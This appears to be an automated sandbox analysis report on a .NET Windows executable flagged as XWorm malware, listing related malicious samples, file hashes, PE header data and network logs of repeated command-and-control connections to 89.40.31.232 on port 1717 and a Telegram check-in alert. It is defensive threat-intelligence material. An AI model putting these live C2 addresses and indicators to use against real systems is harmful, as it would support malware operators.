                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.198.119.143
                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, ocsp.digicert.com, ocsp.edge.digicert.com
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: 2ehwX6LWt3.exe
                            TimeTypeDescription
                            09:36:51API Interceptor12152251x Sleep call for process: 2ehwX6LWt3.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            149.154.167.220tE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                              Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                  November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                        dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                              NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                89.40.31.232Dekont#400577_89008_96634.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 89.40.31.232/12/index.php
                                                No. 1349240400713.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 89.40.31.232/12/index.php
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                api.telegram.orgtE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                • 149.154.167.220
                                                Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                • 149.154.167.220
                                                MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                • 149.154.167.220
                                                November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 149.154.167.220
                                                #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                • 149.154.167.220
                                                dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                • 149.154.167.220
                                                NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                • 149.154.167.220
                                                fp2e7a.wpc.phicdn.nethttp://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                • 192.229.221.95
                                                FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                • 192.229.221.95
                                                New Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                • 192.229.221.95
                                                ORIGINAL INVOICE COAU7230734290.exeGet hashmaliciousFormBookBrowse
                                                • 192.229.221.95
                                                Payment Advice D 0024679526 3930.exeGet hashmaliciousFormBookBrowse
                                                • 192.229.221.95
                                                file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                • 192.229.221.95
                                                05.Unzipped.obfhotel22-11.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                • 192.229.221.95
                                                0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                • 192.229.221.95
                                                somes.exeGet hashmaliciousRedLineBrowse
                                                • 192.229.221.95
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TELEGRAMRUtE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                • 149.154.167.220
                                                Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                • 149.154.167.220
                                                MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                • 149.154.167.220
                                                November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 149.154.167.220
                                                #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                • 149.154.167.220
                                                dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                • 149.154.167.99
                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                • 149.154.167.99
                                                TELEMEDIA-ASROtE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                • 89.40.31.232
                                                Dekont#400577_89008_96634.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 89.40.31.232
                                                No. 1349240400713.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                • 89.40.31.232
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0etE3ZXBTP0B.exeGet hashmaliciousXWormBrowse
                                                • 149.154.167.220
                                                http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                                • 149.154.167.220
                                                https://go.dgdp.net/Get hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                http://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 149.154.167.220
                                                idk_1.ps1Get hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                • 149.154.167.220
                                                PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                • 149.154.167.220
                                                No context
                                                No created / dropped files found
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.066035593487921
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:2ehwX6LWt3.exe
                                                File size:76'805 bytes
                                                MD5:fc95456f5963c777b21445a4b9855903
                                                SHA1:8c08e64bdd1d4840d9d0fe5584d6da08ed970ce8
                                                SHA256:e70aace0217f5661dbce366d36a9bfda8cd4d2b29bb39f71a09ef81c76fa1bc5
                                                SHA512:bed1b0d3b6cb64cb00e7afab03b56793f96d8d4fce77d88605da3eb0ee3b11db581ef04bd32853d32506458bcc4c0f227a213964278c5bb50d0f018fff722daa
                                                SSDEEP:1536:mj2knMmhKdS08aK+rgYkdQOV9bFejQ4HyLPnqo9OMwPvyiaG:mQTnDrGdQo9bFxYo9OtVaG
                                                TLSH:2A737D2837F60525F1FF6FF519F27222DB36B2236903E35F24C8029A5613A89CD516E6
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Pk.g................."...........A... ...`....@.. ....................................@................................
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x4141be
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x671F6B50 [Mon Oct 28 10:45:36 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1416c0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x4be.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x121c40x12200d7f8574e16d0a7a57aede1e6caf0d3b3False0.6174434267241379data6.137584752270185IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x160000x4be0x600aa6623607586acf6251d7d3eab083948False0.3697916666666667data3.6949593603858335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x180000xc0x200c85afa9a31cb63780333b2bb0d33c232False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x160a00x234data0.4698581560283688
                                                RT_MANIFEST0x162d40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                DLLImport
                                                mscoree.dll_CorExeMain
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-11-25T15:36:47.841927+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.649720149.154.167.220443TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 25, 2024 15:36:45.753870964 CET49720443192.168.2.6149.154.167.220
                                                Nov 25, 2024 15:36:45.753904104 CET44349720149.154.167.220192.168.2.6
                                                Nov 25, 2024 15:36:45.753969908 CET49720443192.168.2.6149.154.167.220
                                                Nov 25, 2024 15:36:45.769489050 CET49720443192.168.2.6149.154.167.220
                                                Nov 25, 2024 15:36:45.769506931 CET44349720149.154.167.220192.168.2.6
                                                Nov 25, 2024 15:36:47.261091948 CET44349720149.154.167.220192.168.2.6
                                                Nov 25, 2024 15:36:47.261164904 CET49720443192.168.2.6149.154.167.220
                                                Nov 25, 2024 15:36:47.264075994 CET49720443192.168.2.6149.154.167.220
                                                Nov 25, 2024 15:36:47.264086962 CET44349720149.154.167.220192.168.2.6
                                                Nov 25, 2024 15:36:47.264383078 CET44349720149.154.167.220192.168.2.6
                                                Nov 25, 2024 15:36:47.311940908 CET49720443192.168.2.6149.154.167.220
                                                Nov 25, 2024 15:36:47.322717905 CET49720443192.168.2.6149.154.167.220
                                                Nov 25, 2024 15:36:47.367328882 CET44349720149.154.167.220192.168.2.6
                                                Nov 25, 2024 15:36:47.841963053 CET44349720149.154.167.220192.168.2.6
                                                Nov 25, 2024 15:36:47.842029095 CET44349720149.154.167.220192.168.2.6
                                                Nov 25, 2024 15:36:47.842129946 CET49720443192.168.2.6149.154.167.220
                                                Nov 25, 2024 15:36:47.867003918 CET49720443192.168.2.6149.154.167.220
                                                Nov 25, 2024 15:36:52.661360025 CET497361717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:36:52.792593956 CET17174973689.40.31.232192.168.2.6
                                                Nov 25, 2024 15:36:52.792694092 CET497361717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:36:52.854870081 CET497361717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:36:52.982995987 CET17174973689.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:03.770900965 CET497361717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:03.901087046 CET17174973689.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:14.688302994 CET497361717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:14.768950939 CET17174973689.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:14.769104958 CET497361717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:14.816632032 CET17174973689.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:14.899297953 CET17174973689.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:17.110156059 CET497971717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:17.236855030 CET17174979789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:17.236978054 CET497971717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:17.264674902 CET497971717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:17.396002054 CET17174979789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:28.185817957 CET497971717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:28.458846092 CET17174979789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:39.109569073 CET497971717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:39.197834015 CET17174979789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:39.197900057 CET497971717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:39.229641914 CET17174979789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:39.327872038 CET17174979789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:40.516454935 CET498531717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:40.639513969 CET17174985389.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:40.639627934 CET498531717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:40.657773018 CET498531717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:40.807296991 CET17174985389.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:52.343828917 CET498531717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:52.464287996 CET17174985389.40.31.232192.168.2.6
                                                Nov 25, 2024 15:37:54.328022003 CET498531717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:37:54.450788021 CET17174985389.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:02.745002031 CET17174985389.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:02.745078087 CET498531717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:06.078304052 CET498531717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:06.079801083 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:06.198296070 CET17174985389.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:06.199825048 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:06.203361988 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:06.596654892 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:06.717999935 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:11.593580961 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:11.713943005 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:12.046880960 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:12.167088985 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:12.167155981 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:12.290863991 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:12.290977001 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:12.417857885 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:13.281541109 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:13.406588078 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:19.187572002 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:19.314522028 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:26.265608072 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:26.543504000 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:28.177448034 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:28.177555084 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:32.923765898 CET499181717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:32.936830997 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:33.080493927 CET17174991889.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:33.080511093 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:33.080621004 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:33.110251904 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:33.230189085 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:33.375338078 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:33.496336937 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:34.159641027 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:34.281394005 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:41.703468084 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:41.823579073 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:44.140466928 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:44.260674000 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:44.344021082 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:44.490976095 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:45.906358004 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:46.026762962 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:49.968657970 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:50.088537931 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:50.089351892 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:50.214449883 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:54.877346039 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:54.997994900 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:55.011734009 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:55.011845112 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:55.405988932 CET499771717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:55.408432961 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:55.527559042 CET17174997789.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:55.529568911 CET17175000989.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:55.529669046 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:55.553224087 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:55.678306103 CET17175000989.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:56.031591892 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:56.151865959 CET17175000989.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:56.151942968 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:56.272192955 CET17175000989.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:57.718779087 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:57.841305971 CET17175000989.40.31.232192.168.2.6
                                                Nov 25, 2024 15:38:58.093733072 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:38:58.218943119 CET17175000989.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:06.282161951 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:06.402271032 CET17175000989.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:06.402802944 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:06.522779942 CET17175000989.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:17.465529919 CET17175000989.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:17.465591908 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:21.937300920 CET500091717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:21.939965010 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:22.060688019 CET17175000989.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:22.063179970 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:22.063255072 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:22.116425991 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:22.236428022 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:23.593777895 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:23.715246916 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:25.719108105 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:25.840791941 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:26.234683990 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:26.407181978 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:27.843875885 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:27.965538979 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:27.965615034 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:28.089277029 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:38.109466076 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:38.232127905 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:38.232194901 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:38.352351904 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:38.352415085 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:38.473342896 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:40.921840906 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:41.042278051 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:43.950385094 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:43.950453043 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:48.312412024 CET500101717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:48.315331936 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:48.454226971 CET17175001089.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:48.454246044 CET17175001189.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:48.454329967 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:48.475419998 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:48.595652103 CET17175001189.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:53.593851089 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:53.717144012 CET17175001189.40.31.232192.168.2.6
                                                Nov 25, 2024 15:39:53.717230082 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:39:53.845201969 CET17175001189.40.31.232192.168.2.6
                                                Nov 25, 2024 15:40:03.843849897 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:40:03.964282990 CET17175001189.40.31.232192.168.2.6
                                                Nov 25, 2024 15:40:05.127518892 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:40:05.437422037 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:40:05.773521900 CET17175001189.40.31.232192.168.2.6
                                                Nov 25, 2024 15:40:05.773572922 CET17175001189.40.31.232192.168.2.6
                                                Nov 25, 2024 15:40:10.140829086 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:40:10.261158943 CET17175001189.40.31.232192.168.2.6
                                                Nov 25, 2024 15:40:10.261244059 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:40:10.381305933 CET17175001189.40.31.232192.168.2.6
                                                Nov 25, 2024 15:40:10.381726980 CET17175001189.40.31.232192.168.2.6
                                                Nov 25, 2024 15:40:10.381787062 CET500111717192.168.2.689.40.31.232
                                                Nov 25, 2024 15:40:15.234484911 CET500111717192.168.2.689.40.31.232
